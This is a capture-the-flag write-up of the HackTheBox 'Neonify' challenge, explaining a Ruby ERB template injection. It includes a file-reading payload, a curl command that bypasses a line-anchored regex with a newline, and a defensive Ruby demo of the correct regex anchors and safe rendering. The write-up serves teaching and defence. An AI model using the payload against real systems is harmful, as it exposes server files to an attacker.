We covered the Server Side Template Injection (SSTI) vulnerability and demonstrated a practical scenario using the HackTheBox Neonify web challenge. SSTI is a server-side vulnerability in which user input is passed directly to the template engine without validation. In the example we covered, the code contained a regular-expression filter to rule out bad characters, so we used a newline character and URL-encoded the payload to reveal the flag contents.


CHALLENGE DESCRIPTION

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this SSTI payload to read and reveal sensitive files
  • <%= File.open('flag.txt').read %>
  • The payload should be URL-encoded and preceded by a newline character.

An example request can be sent with curl using the below command to reveal the flag.

curl -d 'neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' ip:port
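The filter bypass above works because in Ruby regular expressions `^` and `$` match at line boundaries, not at the start and end of the whole string, so a value whose first line is clean passes the check even when a later line contains ERB tags. The following is an added example, not code from the challenge or from the original post: it models a weak filter beside a hardened one (`\A`/`\z` anchors) and contrasts interpolating user input into the template source with passing it in as escaped data. The pattern names, the `neon` markup and the sample input are constructed for illustration.

```ruby
require 'erb'

# Constructed model of the weak check: ^ and $ anchor at line boundaries in
# Ruby, so "a\n<%= ... %>" matches because the first line is clean.
WEAK_PATTERN   = /^[A-Za-z0-9 ]+$/

# Hardened check: \A and \z anchor at the start and end of the whole string,
# so a newline anywhere in the value causes the match to fail.
STRICT_PATTERN = /\A[A-Za-z0-9 ]+\z/

# Returns true when the input satisfies the given allow-list pattern.
def allowed?(input, pattern)
  !!(input =~ pattern)
end

# Vulnerable rendering: the user value becomes part of the template source,
# so any ERB tags it contains are executed by the template engine.
def render_unsafe(input)
  ERB.new("<h1 class=\"neon\">#{input}</h1>").result(binding)
end

# Safe rendering: the template is a fixed string and the user value is
# exposed as a local variable, HTML-escaped on output, so it is only ever
# treated as data and never parsed as template code.
def render_safe(input)
  text = input
  template = ERB.new('<h1 class="neon"><%= ERB::Util.html_escape(text) %></h1>')
  template.result(binding)
end

# Constructed multi-line input: a clean first line followed by an ERB tag.
# A benign expression is used so the effect is visible without side effects.
SAMPLE = "a\n<%= 6 * 7 %>"

if __FILE__ == $0
  puts "weak filter allows sample?   #{allowed?(SAMPLE, WEAK_PATTERN)}"   # true
  puts "strict filter allows sample? #{allowed?(SAMPLE, STRICT_PATTERN)}" # false
  puts "unsafe render: #{render_unsafe(SAMPLE).inspect}"  # tag evaluated to 42
  puts "safe render:   #{render_safe(SAMPLE).inspect}"    # tag shown as text
end
```

Run with `ruby filename.rb`. The takeaway for defenders is twofold: an input allow-list must use `\A` and `\z` (or reject control characters outright), and, independently of any filter, user-controlled values should be supplied to a fixed template as data rather than concatenated into the template string.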

Video Walkthrough

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.
